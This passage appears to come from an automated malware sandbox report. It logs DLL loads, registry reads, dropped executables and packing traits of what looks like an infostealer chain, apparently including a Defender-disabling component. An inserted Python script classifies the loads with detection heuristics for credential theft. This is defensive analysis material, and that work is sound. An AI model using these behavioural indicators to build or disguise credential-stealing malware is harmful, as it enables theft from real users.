Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: ucrtbase_clr0400.dll
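The "Section loaded" entries above are raw per-process image-load observations; on a live host the equivalent telemetry is Sysmon Event ID 7. As an added example (not part of the Joe Sandbox report and not code from the sample), the following Python groups such lines by process and tags each process with the capability its loaded DLLs imply. The DLL-to-capability mapping, the user-writable-path check and the "stealer-profile" rule are heuristics chosen here, and the input is a handful of lines copied from this report.

```python
"""Per-process image-load triage over Joe Sandbox 'Section loaded' lines (added example)."""
import re
from collections import defaultdict

LINE_RE = re.compile(r"^Source:\s+(?P<proc>.+?)\s+Section loaded:\s+(?P<dll>\S+)\s*$")

# Heuristic DLL groups: which capability a load implies (assumption, not a Joe Sandbox rule)
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SCRIPT_ENGINES = {"vbscript.dll", "jscript.dll", "jscript9.dll", "scrrun.dll"}
HTTP_STACK = {"winhttp.dll", "wininet.dll", "webio.dll"}
TLS_STACK = {"schannel.dll", "ncrypt.dll", "ncryptsslp.dll"}
CLR_RUNTIME = {"mscoree.dll", "vcruntime140_clr0400.dll", "ucrtbase_clr0400.dll"}
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Documents|Downloads)\\", re.I)


def parse_loads(lines):
    """Map each process path to the set of DLL names it loaded."""
    loads = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            loads[m["proc"]].add(m["dll"].lower())
    return loads


def tag_process(path, dlls):
    """Return capability tags for one process from its loaded-DLL set."""
    name = path.rsplit("\\", 1)[-1].lower()
    tags = set()
    if name in SCRIPT_HOSTS and dlls & SCRIPT_ENGINES:
        tags.add("script-execution")
    if "amsi.dll" in dlls:
        tags.add("amsi-loaded")          # scan hook is present; look for AMSI tampering later
    if dlls & HTTP_STACK and dlls & TLS_STACK:
        tags.add("https-client")
    if "dpapi.dll" in dlls:
        tags.add("dpapi")                # CryptUnprotectData, used on browser credential blobs
    if "wbemcomn.dll" in dlls:
        tags.add("wmi")                  # WMI client, e.g. Win32_DiskDrive VM checks
    if "rstrtmgr.dll" in dlls:
        tags.add("restart-manager")      # Restart Manager: get at files another process holds open
    if dlls & CLR_RUNTIME:
        tags.add("dotnet")               # managed payload (PureCrypter is a .NET loader)
    if USER_WRITABLE.search(path):
        tags.add("user-writable-path")
        # Same DLLs in a system script host are routine; from a Temp-path EXE they are a stealer tell.
        if {"https-client", "dpapi"} <= tags or {"https-client", "restart-manager"} <= tags:
            tags.add("stealer-profile")
    return tags


def tag_image_loads(lines):
    """Triage every process in the given report lines: {process path: sorted tags}."""
    return {proc: sorted(tag_process(proc, dlls)) for proc, dlls in parse_loads(lines).items()}


# Sample input: lines copied from this report (constructed subset, not the full log)
SAMPLE_LINES = r"""
Source: C:\Windows\System32\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
""".strip().splitlines()

if __name__ == "__main__":
    for proc, tags in tag_image_loads(SAMPLE_LINES).items():
        print(proc, "->", ", ".join(tags))
```

The point of the path check is that the DLL set alone is ambiguous: the SysWOW64 powershell.exe in this report loads the same winhttp/schannel/dpapi trio as 4136f86ac7.exe, which is ordinary for PowerShell, so only the Temp-path executable earns the stealer profile.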
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 1815040 > 1048576
Source: file.exe Static PE information: Raw size of xxdbzcjj is bigger than: 0x100000 < 0x1a1600
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0ac2a0f3ae.exe, 00000024.00000002.3119535099.0000000000A12000.00000040.00000001.01000000.00000019.sdmp, 0ac2a0f3ae.exe, 00000024.00000003.2983049780.0000000004F00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.390000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Unpacked PE file: 20.2.DocumentsECAFHIIJJE.exe.720000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 21.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 23.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Unpacked PE file: 24.2.file1.exe.7f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ytlmplcn:EW;gdxiagsi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ytlmplcn:EW;gdxiagsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Unpacked PE file: 30.2.4136f86ac7.exe.c10000.1.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Unpacked PE file: 31.2.3160604f40.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
